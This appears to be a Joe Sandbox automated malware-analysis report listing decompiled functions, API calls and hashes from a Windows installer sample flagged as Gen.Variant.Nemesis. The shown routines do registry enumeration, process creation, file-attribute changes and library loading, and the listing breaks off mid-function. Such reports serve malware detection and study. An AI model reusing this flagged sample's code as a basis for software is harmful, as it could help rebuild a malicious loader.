                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 334405425-0
                                                  • Opcode ID: 57a0a3861126cd1cf6113bcab6e3fe6859f719f612c4d6b86b9542baaaa6fbc1
                                                  • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                  • Opcode Fuzzy Hash: 57a0a3861126cd1cf6113bcab6e3fe6859f719f612c4d6b86b9542baaaa6fbc1
                                                  • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
                                                  				void* _t9;
                                                  				int _t10;
                                                  				long _t13;
                                                  				int* _t16;
                                                  				intOrPtr _t21;
                                                  				short* _t22;
                                                  				void* _t24;
                                                  				void* _t26;
                                                  				void* _t29;
                                                  
                                                  				_t22 = __edi;
                                                  				_t21 = __edx;
                                                  				_t16 = __ebx;
                                                  				_t9 = E00402DE6(_t29, 0x20019); // executed
                                                  				_t24 = _t9;
                                                  				_t10 = E00402D84(3);
                                                  				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
                                                  				 *__edi = __ebx;
                                                  				if(_t24 == __ebx) {
                                                  					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                  				} else {
                                                  					 *(_t26 + 8) = 0x3ff;
                                                  					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
                                                  						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx); // executed
                                                  						__eflags = _t13;
                                                  						if(_t13 != 0) {
                                                  							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                  						}
                                                  					} else {
                                                  						RegEnumKeyW(_t24, _t10, __edi, 0x3ff); // executed
                                                  					}
                                                  					_t22[0x3ff] = _t16;
                                                  					_push(_t24); // executed
                                                  					RegCloseKey(); // executed
                                                  				}
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
                                                  				return 0;
                                                  			}












                                                  0x0040259e
                                                  0x0040259e
                                                  0x0040259e
                                                  0x004025a3
                                                  0x004025aa
                                                  0x004025ac
                                                  0x004025b4
                                                  0x004025b7
                                                  0x004025ba
                                                  0x0040292e
                                                  0x004025c0
                                                  0x004025c8
                                                  0x004025cb
                                                  0x004025e4
                                                  0x004025ea
                                                  0x004025ec
                                                  0x004025ee
                                                  0x004025ee
                                                  0x004025cd
                                                  0x004025d1
                                                  0x004025d1
                                                  0x004025f5
                                                  0x004025fc
                                                  0x004025fd
                                                  0x004025fd
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                  • RegEnumValueW.KERNELBASE(00000000,00000000,?,?), ref: 004025E4
                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsy8A61.tmp,00000000,00000011,00000002), ref: 004025FD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Enum$CloseValue
                                                  • String ID:
                                                  • API String ID: 397863658-0
                                                  • Opcode ID: eb9df6b21734892f9bbad1cbe90c9056fa24d27ccda46ff3ee83950333d8f9d7
                                                  • Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
                                                  • Opcode Fuzzy Hash: eb9df6b21734892f9bbad1cbe90c9056fa24d27ccda46ff3ee83950333d8f9d7
                                                  • Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 84%
                                                  			E0040252A(int* __ebx, char* __edi) {
                                                  				void* _t17;
                                                  				short* _t18;
                                                  				void* _t35;
                                                  				void* _t37;
                                                  				void* _t40;
                                                  
                                                  				_t33 = __edi;
                                                  				_t27 = __ebx;
                                                  				_t17 = E00402DE6(_t40, 0x20019); // executed
                                                  				_t35 = _t17;
                                                  				_t18 = E00402DA6(0x33);
                                                  				 *__edi = __ebx;
                                                  				if(_t35 == __ebx) {
                                                  					 *(_t37 - 4) = 1;
                                                  				} else {
                                                  					 *(_t37 - 0x10) = 0x800;
                                                  					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
                                                  						L7:
                                                  						 *_t33 = _t27;
                                                  						 *(_t37 - 4) = 1;
                                                  					} else {
                                                  						if( *(_t37 + 8) == 4) {
                                                  							__eflags =  *(_t37 - 0x20) - __ebx;
                                                  							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
                                                  							E00406484(__edi,  *__edi);
                                                  						} else {
                                                  							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                  								 *(_t37 - 4) =  *(_t37 - 0x20);
                                                  								_t33[0x7fe] = _t27;
                                                  							} else {
                                                  								goto L7;
                                                  							}
                                                  						}
                                                  					}
                                                  					_push(_t35); // executed
                                                  					RegCloseKey(); // executed
                                                  				}
                                                  				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
                                                  				return 0;
                                                  			}








                                                  0x0040252a
                                                  0x0040252a
                                                  0x0040252f
                                                  0x00402536
                                                  0x00402538
                                                  0x0040253f
                                                  0x00402542
                                                  0x0040292e
                                                  0x00402548
                                                  0x0040254b
                                                  0x00402566
                                                  0x00402596
                                                  0x00402596
                                                  0x00402599
                                                  0x00402568
                                                  0x0040256c
                                                  0x00402585
                                                  0x0040258c
                                                  0x0040258f
                                                  0x0040256e
                                                  0x00402571
                                                  0x0040257c
                                                  0x004025f5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402571
                                                  0x0040256c
                                                  0x004025fc
                                                  0x004025fd
                                                  0x004025fd
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsy8A61.tmp,00000000,00000011,00000002), ref: 004025FD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID:
                                                  • API String ID: 3356406503-0
                                                  • Opcode ID: eec3f70398031fc336dcd3e0d600c2292d380f0397dd8c1913a76aa5ba941c81
                                                  • Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
                                                  • Opcode Fuzzy Hash: eec3f70398031fc336dcd3e0d600c2292d380f0397dd8c1913a76aa5ba941c81
                                                  • Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 69%
                                                  			E00401389(signed int _a4) {
                                                  				intOrPtr* _t6;
                                                  				void* _t8;
                                                  				void* _t10;
                                                  				signed int _t11;
                                                  				void* _t12;
                                                  				signed int _t16;
                                                  				signed int _t17;
                                                  				void* _t18;
                                                  
                                                  				_t17 = _a4;
                                                  				while(_t17 >= 0) {
                                                  					_t6 = _t17 * 0x1c +  *0x434f30;
                                                  					if( *_t6 == 1) {
                                                  						break;
                                                  					}
                                                  					_push(_t6); // executed
                                                  					_t8 = E00401434(); // executed
                                                  					if(_t8 == 0x7fffffff) {
                                                  						return 0x7fffffff;
                                                  					}
                                                  					_t10 = E0040136D(_t8);
                                                  					if(_t10 != 0) {
                                                  						_t11 = _t10 - 1;
                                                  						_t16 = _t17;
                                                  						_t17 = _t11;
                                                  						_t12 = _t11 - _t16;
                                                  					} else {
                                                  						_t12 = _t10 + 1;
                                                  						_t17 = _t17 + 1;
                                                  					}
                                                  					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                  						 *0x433eec =  *0x433eec + _t12;
                                                  						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
                                                  					}
                                                  				}
                                                  				return 0;
                                                  			}











                                                  0x0040138a
                                                  0x004013fa
                                                  0x0040139b
                                                  0x004013a0
                                                  0x00000000
                                                  0x00000000
                                                  0x004013a2
                                                  0x004013a3
                                                  0x004013ad
                                                  0x00000000
                                                  0x00401404
                                                  0x004013b0
                                                  0x004013b7
                                                  0x004013bd
                                                  0x004013be
                                                  0x004013c0
                                                  0x004013c2
                                                  0x004013b9
                                                  0x004013b9
                                                  0x004013ba
                                                  0x004013ba
                                                  0x004013c9
                                                  0x004013cb
                                                  0x004013f4
                                                  0x004013f4
                                                  0x004013c9
                                                  0x00000000

                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                  • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                  • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                  • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Window$EnableShow
                                                  • String ID:
                                                  • API String ID: 1136574915-0
                                                  • Opcode ID: fa234a311d5315365d19d83b79d92e578c8214a2500263e11cb90b957d52e03b
                                                  • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                  • Opcode Fuzzy Hash: fa234a311d5315365d19d83b79d92e578c8214a2500263e11cb90b957d52e03b
                                                  • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405B20(WCHAR* _a4) {
                                                  				struct _PROCESS_INFORMATION _v20;
                                                  				int _t7;
                                                  
                                                  				0x430270->cb = 0x44;
                                                  				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
                                                  				if(_t7 != 0) {
                                                  					CloseHandle(_v20.hThread);
                                                  					return _v20.hProcess;
                                                  				}
                                                  				return _t7;
                                                  			}





                                                  0x00405b29
                                                  0x00405b49
                                                  0x00405b51
                                                  0x00405b56
                                                  0x00000000
                                                  0x00405b5c
                                                  0x00405b60

                                                  APIs
                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
                                                  • CloseHandle.KERNEL32(?), ref: 00405B56
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3712363035-0
                                                  • Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                  • Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
                                                  • Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                  • Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040690A(signed int _a4) {
                                                  				struct HINSTANCE__* _t5;
                                                  				signed int _t10;
                                                  
                                                  				_t10 = _a4 << 3;
                                                  				_t8 =  *(_t10 + 0x40a3e0);
                                                  				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                  				if(_t5 != 0) {
                                                  					L2:
                                                  					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                  				}
                                                  				_t5 = E0040689A(_t8); // executed
                                                  				if(_t5 == 0) {
                                                  					return 0;
                                                  				}
                                                  				goto L2;
                                                  			}





                                                  0x00406912
                                                  0x00406915
                                                  0x0040691c
                                                  0x00406924
                                                  0x00406930
                                                  0x00000000
                                                  0x00406937
                                                  0x00406927
                                                  0x0040692e
                                                  0x00000000
                                                  0x0040693f
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                    • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                    • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                    • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                  • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                  • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                  • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E0040602D(WCHAR* _a4, long _a8, long _a12) {
                                                  				signed int _t5;
                                                  				void* _t6;
                                                  
                                                  				_t5 = GetFileAttributesW(_a4); // executed
                                                  				asm("sbb ecx, ecx");
                                                  				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                  				return _t6;
                                                  			}





                                                  0x00406031
                                                  0x0040603e
                                                  0x00406053
                                                  0x00406059

                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                  • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                  • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                  • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406008(WCHAR* _a4) {
                                                  				signed char _t3;
                                                  				signed char _t7;
                                                  
                                                  				_t3 = GetFileAttributesW(_a4); // executed
                                                  				_t7 = _t3;
                                                  				if(_t7 != 0xffffffff) {
                                                  					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                  				}
                                                  				return _t7;
                                                  			}





                                                  0x0040600d
                                                  0x00406013
                                                  0x00406018
                                                  0x00406021
                                                  0x00406021
                                                  0x0040602a

                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                  • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                  • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                  • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405AEB(WCHAR* _a4) {
                                                  				int _t2;
                                                  
                                                  				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                  				if(_t2 == 0) {
                                                  					return GetLastError();
                                                  				}
                                                  				return 0;
                                                  			}




                                                  0x00405af1
                                                  0x00405af9
                                                  0x00000000
                                                  0x00405aff
                                                  0x00000000

                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                  • GetLastError.KERNEL32 ref: 00405AFF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                  • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                  • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                  • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 19%
                                                  			E71082B98(void* __ecx, intOrPtr _a4) {
                                                  				signed int _v8;
                                                  				void* _t28;
                                                  				void* _t29;
                                                  				void* _t33;
                                                  				void* _t37;
                                                  				void* _t40;
                                                  				void* _t45;
                                                  				void* _t49;
                                                  				signed int _t56;
                                                  				void* _t61;
                                                  				void* _t70;
